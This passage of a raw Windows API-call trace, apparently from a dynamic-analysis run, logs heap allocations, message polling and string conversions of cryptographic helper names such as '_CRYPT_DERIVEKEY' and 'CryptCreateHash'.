Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0268.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0268.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0268.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0268.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0268.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0268.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0268.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0268.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0268.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15178 | out: hHeap=0x970000) returned 1 [0268.365] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0268.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0268.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0268.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0268.366] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.366] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0268.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f78 [0268.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0268.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0268.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0268.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0268.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0268.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0268.366] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0268.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.367] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0268.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0268.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0268.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0268.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0268.367] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0268.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.367] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0268.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.368] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.368] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.368] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.368] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0268.368] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0268.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0268.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0268.368] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0268.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.368] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0268.368] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.369] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0268.369] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0268.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0268.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.371] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0268.371] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0268.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0268.371] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.371] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0268.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.371] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.371] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.372] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0268.372] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.372] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.372] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0268.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0268.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.372] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.372] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0268.373] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0268.373] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0268.373] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0268.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0268.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0268.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 